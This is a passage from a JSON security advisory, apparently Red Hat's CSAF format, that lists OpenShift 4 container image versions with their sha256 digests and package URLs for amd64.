"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:32488f18b64730ec0984572eefce302c966c451d60876c3550583d388e367fbb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3A32488f18b64730ec0984572eefce302c966c451d60876c3550583d388e367fbb?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773320537"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:52ea8e976c4493d18356056e776b27d0100b9ff1d13a7c1843b8bf1bb29af9fb_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:52ea8e976c4493d18356056e776b27d0100b9ff1d13a7c1843b8bf1bb29af9fb_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:52ea8e976c4493d18356056e776b27d0100b9ff1d13a7c1843b8bf1bb29af9fb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3A52ea8e976c4493d18356056e776b27d0100b9ff1d13a7c1843b8bf1bb29af9fb?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773252333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:79c9e0cd616983cf38b32c1606d9636f539975aa79b413ac9f06e0b336bd3d94_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:79c9e0cd616983cf38b32c1606d9636f539975aa79b413ac9f06e0b336bd3d94_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:79c9e0cd616983cf38b32c1606d9636f539975aa79b413ac9f06e0b336bd3d94_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3A79c9e0cd616983cf38b32c1606d9636f539975aa79b413ac9f06e0b336bd3d94?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772732947"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:bd4827507f60faea220fc23b0c5e96852d6a0f264b1ab4244b0f3a6733aed226_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:bd4827507f60faea220fc23b0c5e96852d6a0f264b1ab4244b0f3a6733aed226_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:bd4827507f60faea220fc23b0c5e96852d6a0f264b1ab4244b0f3a6733aed226_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3Abd4827507f60faea220fc23b0c5e96852d6a0f264b1ab4244b0f3a6733aed226?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773334557"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fd5caff02b551caf0a6246b803591de5b01a5ee5e4caf98f0bbc42003bb0ffbe_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fd5caff02b551caf0a6246b803591de5b01a5ee5e4caf98f0bbc42003bb0ffbe_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fd5caff02b551caf0a6246b803591de5b01a5ee5e4caf98f0bbc42003bb0ffbe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-nfs-rhel9@sha256%3Afd5caff02b551caf0a6246b803591de5b01a5ee5e4caf98f0bbc42003bb0ffbe?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772749305"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:01fe42bef62e141999ec7b9a9863393a676ea4abafdd00d12a09df44c4eca8fd_amd64",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:01fe42bef62e141999ec7b9a9863393a676ea4abafdd00d12a09df44c4eca8fd_amd64",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:01fe42bef62e141999ec7b9a9863393a676ea4abafdd00d12a09df44c4eca8fd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3A01fe42bef62e141999ec7b9a9863393a676ea4abafdd00d12a09df44c4eca8fd?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773739265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:c691d971d54dfac8a3d2b4560df928887c0c42726ea53276acc6fd82796fe013_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:c691d971d54dfac8a3d2b4560df928887c0c42726ea53276acc6fd82796fe013_amd64",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:c691d971d54dfac8a3d2b4560df928887c0c42726ea53276acc6fd82796fe013_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3Ac691d971d54dfac8a3d2b4560df928887c0c42726ea53276acc6fd82796fe013?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773412958"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f3906dd6b9a9de755e0f94b1cf9f38855ebc93b8d3bcb66330e86553b9a0a8c2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f3906dd6b9a9de755e0f94b1cf9f38855ebc93b8d3bcb66330e86553b9a0a8c2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f3906dd6b9a9de755e0f94b1cf9f38855ebc93b8d3bcb66330e86553b9a0a8c2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-rhel9@sha256%3Af3906dd6b9a9de755e0f94b1cf9f38855ebc93b8d3bcb66330e86553b9a0a8c2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772732981"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:691b019fb05a753e814a5aba61569635318334e29f4a8bfee0ff0c0c33028978_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:691b019fb05a753e814a5aba61569635318334e29f4a8bfee0ff0c0c33028978_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:691b019fb05a753e814a5aba61569635318334e29f4a8bfee0ff0c0c33028978_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-agent-rhel9@sha256%3A691b019fb05a753e814a5aba61569635318334e29f4a8bfee0ff0c0c33028978?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772732880"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:7679a49d3de0c40c142457d4d5ff66e22d5dffaa563fd58227d92f7483239779_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:7679a49d3de0c40c142457d4d5ff66e22d5dffaa563fd58227d92f7483239779_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:7679a49d3de0c40c142457d4d5ff66e22d5dffaa563fd58227d92f7483239779_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-machine-os-downloader-rhel9@sha256%3A7679a49d3de0c40c142457d4d5ff66e22d5dffaa563fd58227d92f7483239779?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773351115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:8d95ee03d7ae5eed6b0f051341812973b5a9a5af0ebb78e290db44aa9fd63aea_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:8d95ee03d7ae5eed6b0f051341812973b5a9a5af0ebb78e290db44aa9fd63aea_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:8d95ee03d7ae5eed6b0f051341812973b5a9a5af0ebb78e290db44aa9fd63aea_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3A8d95ee03d7ae5eed6b0f051341812973b5a9a5af0ebb78e290db44aa9fd63aea?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773350955"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2f7019f05cffad43ab49fccc06fd23c04e9528c0a8ff5f0e59a9e3ea9297eed3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2f7019f05cffad43ab49fccc06fd23c04e9528c0a8ff5f0e59a9e3ea9297eed3_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2f7019f05cffad43ab49fccc06fd23c04e9528c0a8ff5f0e59a9e3ea9297eed3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A2f7019f05cffad43ab49fccc06fd23c04e9528c0a8ff5f0e59a9e3ea9297eed3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773172418"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:58f80f5145dc8e26cad376643dc01b4906f554c692cb6549ff75ac6d6651c4d5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:58f80f5145dc8e26cad376643dc01b4906f554c692cb6549ff75ac6d6651c4d5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:58f80f5145dc8e26cad376643dc01b4906f554c692cb6549ff75ac6d6651c4d5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3A58f80f5145dc8e26cad376643dc01b4906f554c692cb6549ff75ac6d6651c4d5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773746857"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:1e6aa292e001c7241399cbf5ca290e8fd58be92f58b0f5d194ea4d5fd38db82c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:1e6aa292e001c7241399cbf5ca290e8fd58be92f58b0f5d194ea4d5fd38db82c_amd64",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:1e6aa292e001c7241399cbf5ca290e8fd58be92f58b0f5d194ea4d5fd38db82c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3A1e6aa292e001c7241399cbf5ca290e8fd58be92f58b0f5d194ea4d5fd38db82c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772896602"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:47fcac8f8d0002e0f7d66cc90f9f2768b9c9e713089ce281bc4c39532f9d8290_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:47fcac8f8d0002e0f7d66cc90f9f2768b9c9e713089ce281bc4c39532f9d8290_amd64",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:47fcac8f8d0002e0f7d66cc90f9f2768b9c9e713089ce281bc4c39532f9d8290_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3A47fcac8f8d0002e0f7d66cc90f9f2768b9c9e713089ce281bc4c39532f9d8290?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772733078"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:ad4e1756a4e4703806818721c390347d06632762eb0613e34fdd9dff25122d93_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:ad4e1756a4e4703806818721c390347d06632762eb0613e34fdd9dff25122d93_amd64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:ad4e1756a4e4703806818721c390347d06632762eb0613e34fdd9dff25122d93_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3Aad4e1756a4e4703806818721c390347d06632762eb0613e34fdd9dff25122d93?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773280408"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:0556a83b37f75836a6269c901f4fe9898dded7f04e8d4096d0b4ad09d53dfe90_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:0556a83b37f75836a6269c901f4fe9898dded7f04e8d4096d0b4ad09d53dfe90_amd64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:0556a83b37f75836a6269c901f4fe9898dded7f04e8d4096d0b4ad09d53dfe90_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3A0556a83b37f75836a6269c901f4fe9898dded7f04e8d4096d0b4ad09d53dfe90?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773252330"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:0796012228b715b8d0b1f7f8a8716e5fcb8e1eef5b4c91c1b9aeb586764165a1_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:0796012228b715b8d0b1f7f8a8716e5fcb8e1eef5b4c91c1b9aeb586764165a1_amd64",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:0796012228b715b8d0b1f7f8a8716e5fcb8e1eef5b4c91c1b9aeb586764165a1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3A0796012228b715b8d0b1f7f8a8716e5fcb8e1eef5b4c91c1b9aeb586764165a1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773350963"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:570296451ca687e24780c6e744043252477d343f01abbf293369d83f15abd62e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:570296451ca687e24780c6e744043252477d343f01abbf293369d83f15abd62e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:570296451ca687e24780c6e744043252477d343f01abbf293369d83f15abd62e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3A570296451ca687e24780c6e744043252477d343f01abbf293369d83f15abd62e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773746829"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:cba938605fa4d8155605e1d2c7f44e28a207ae3598bab7734b3a1a040b77a5f6_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:cba938605fa4d8155605e1d2c7f44e28a207ae3598bab7734b3a1a040b77a5f6_amd64",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:cba938605fa4d8155605e1d2c7f44e28a207ae3598bab7734b3a1a040b77a5f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3Acba938605fa4d8155605e1d2c7f44e28a207ae3598bab7734b3a1a040b77a5f6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773350811"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:d358700abe87cbc60cbc05dc55dea6e587ec491f18a85b5614456baced6e7b42_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:d358700abe87cbc60cbc05dc55dea6e587ec491f18a85b5614456baced6e7b42_amd64",
"product_id": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:d358700abe87cbc60cbc05dc55dea6e587ec491f18a85b5614456baced6e7b42_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tests-rhel9@sha256%3Ad358700abe87cbc60cbc05dc55dea6e587ec491f18a85b5614456baced6e7b42?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773413265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:45153e4c66f37343ea27bab6df05b9c45a9b75d346678c574a2645ac26a6af3e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:45153e4c66f37343ea27bab6df05b9c45a9b75d346678c574a2645ac26a6af3e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:45153e4c66f37343ea27bab6df05b9c45a9b75d346678c574a2645ac26a6af3e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3A45153e4c66f37343ea27bab6df05b9c45a9b75d346678c574a2645ac26a6af3e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773313312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:706f1b7b8e8ddccd2fd47292295e781954c5ca601f359d8b38c8ae2403ea00ca_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:706f1b7b8e8ddccd2fd47292295e781954c5ca601f359d8b38c8ae2403ea00ca_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:706f1b7b8e8ddccd2fd47292295e781954c5ca601f359d8b38c8ae2403ea00ca_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3A706f1b7b8e8ddccd2fd47292295e781954c5ca601f359d8b38c8ae2403ea00ca?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773313312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ada91f9ca5511960bf9186bbdf489e8702f5cd6b8dd3de904e99e4cd0cd27d02_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ada91f9ca5511960bf9186bbdf489e8702f5cd6b8dd3de904e99e4cd0cd27d02_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ada91f9ca5511960bf9186bbdf489e8702f5cd6b8dd3de904e99e4cd0cd27d02_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-api-server-rhel9@sha256%3Aada91f9ca5511960bf9186bbdf489e8702f5cd6b8dd3de904e99e4cd0cd27d02?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773363720"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:534b97046a6f7b420a88295ce95651c3dbdf6024ef13c6941ffc83f4880ae5f1_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:534b97046a6f7b420a88295ce95651c3dbdf6024ef13c6941ffc83f4880ae5f1_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:534b97046a6f7b420a88295ce95651c3dbdf6024ef13c6941ffc83f4880ae5f1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A534b97046a6f7b420a88295ce95651c3dbdf6024ef13c6941ffc83f4880ae5f1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773430219"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:830c1cd0eabd63ccf8720de080e5afd1d4612df9953e7f15548c6939a5f0601f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:830c1cd0eabd63ccf8720de080e5afd1d4612df9953e7f15548c6939a5f0601f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:830c1cd0eabd63ccf8720de080e5afd1d4612df9953e7f15548c6939a5f0601f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A830c1cd0eabd63ccf8720de080e5afd1d4612df9953e7f15548c6939a5f0601f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773252335"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:741a9140d522d685da85e744f088722106e5e6ef5130bb58616a5ceafb7aa46e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:741a9140d522d685da85e744f088722106e5e6ef5130bb58616a5ceafb7aa46e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:741a9140d522d685da85e744f088722106e5e6ef5130bb58616a5ceafb7aa46e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3A741a9140d522d685da85e744f088722106e5e6ef5130bb58616a5ceafb7aa46e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772896477"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:997da5aecef571f4733b9de7a23882decc79f3b1e121f9524cb58d5f0343a8b2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:997da5aecef571f4733b9de7a23882decc79f3b1e121f9524cb58d5f0343a8b2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:997da5aecef571f4733b9de7a23882decc79f3b1e121f9524cb58d5f0343a8b2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-rhel9@sha256%3A997da5aecef571f4733b9de7a23882decc79f3b1e121f9524cb58d5f0343a8b2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773747007"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ed059e0a5fc89373a42df693cce41426035f587aa81cf2ac7986d3c3a74bc252_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ed059e0a5fc89373a42df693cce41426035f587aa81cf2ac7986d3c3a74bc252_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ed059e0a5fc89373a42df693cce41426035f587aa81cf2ac7986d3c3a74bc252_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9@sha256%3Aed059e0a5fc89373a42df693cce41426035f587aa81cf2ac7986d3c3a74bc252?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772749195"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:8af34f7f4fb73551a98d986d0bb1e59beb3ff58fed5c0abcdf7fa4ff40697926_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:8af34f7f4fb73551a98d986d0bb1e59beb3ff58fed5c0abcdf7fa4ff40697926_amd64",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:8af34f7f4fb73551a98d986d0bb1e59beb3ff58fed5c0abcdf7fa4ff40697926_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3A8af34f7f4fb73551a98d986d0bb1e59beb3ff58fed5c0abcdf7fa4ff40697926?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773429934"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:ce1eb507f327c654614af04bf3cdfc16b958e4826f5aabc3c2d9ba94f4f2e55c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:ce1eb507f327c654614af04bf3cdfc16b958e4826f5aabc3c2d9ba94f4f2e55c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:ce1eb507f327c654614af04bf3cdfc16b958e4826f5aabc3c2d9ba94f4f2e55c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3Ace1eb507f327c654614af04bf3cdfc16b958e4826f5aabc3c2d9ba94f4f2e55c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773430140"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:11f24e17e3fd1bcb25241c47d76bd3800593e9f4a493e7e545cbedcd1926da2d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:11f24e17e3fd1bcb25241c47d76bd3800593e9f4a493e7e545cbedcd1926da2d_amd64",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:11f24e17e3fd1bcb25241c47d76bd3800593e9f4a493e7e545cbedcd1926da2d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3A11f24e17e3fd1bcb25241c47d76bd3800593e9f4a493e7e545cbedcd1926da2d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773412620"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:d0f27efa05b636e158d326467493b4bbc37a33b9e9965f54d650544d63e3ef01_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:d0f27efa05b636e158d326467493b4bbc37a33b9e9965f54d650544d63e3ef01_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:d0f27efa05b636e158d326467493b4bbc37a33b9e9965f54d650544d63e3ef01_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-config-rhel9-operator@sha256%3Ad0f27efa05b636e158d326467493b4bbc37a33b9e9965f54d650544d63e3ef01?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773174302"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:9d17eb13f9c4440fd39d57fff9e6dfd0c501a588d51ee4083f42afaf96118a8c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:9d17eb13f9c4440fd39d57fff9e6dfd0c501a588d51ee4083f42afaf96118a8c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:9d17eb13f9c4440fd39d57fff9e6dfd0c501a588d51ee4083f42afaf96118a8c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3A9d17eb13f9c4440fd39d57fff9e6dfd0c501a588d51ee4083f42afaf96118a8c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773699238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:f1daae683b8df5ea0e559e3acfdd53491bcf4fd589a129c70b77e6621480003e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:f1daae683b8df5ea0e559e3acfdd53491bcf4fd589a129c70b77e6621480003e_amd64",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:f1daae683b8df5ea0e559e3acfdd53491bcf4fd589a129c70b77e6621480003e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3Af1daae683b8df5ea0e559e3acfdd53491bcf4fd589a129c70b77e6621480003e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773220410"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:4f54aacc484e51eebd471b1fe856929613e08e43c9eff0af3712e1f8f2a2d1f8_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:4f54aacc484e51eebd471b1fe856929613e08e43c9eff0af3712e1f8f2a2d1f8_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:4f54aacc484e51eebd471b1fe856929613e08e43c9eff0af3712e1f8f2a2d1f8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3A4f54aacc484e51eebd471b1fe856929613e08e43c9eff0af3712e1f8f2a2d1f8?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773746885"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:a3dd55efb46f98a95d7161c464253cbf2e7157446935df921e08c5037aaa3c6d_amd64",
"product": {
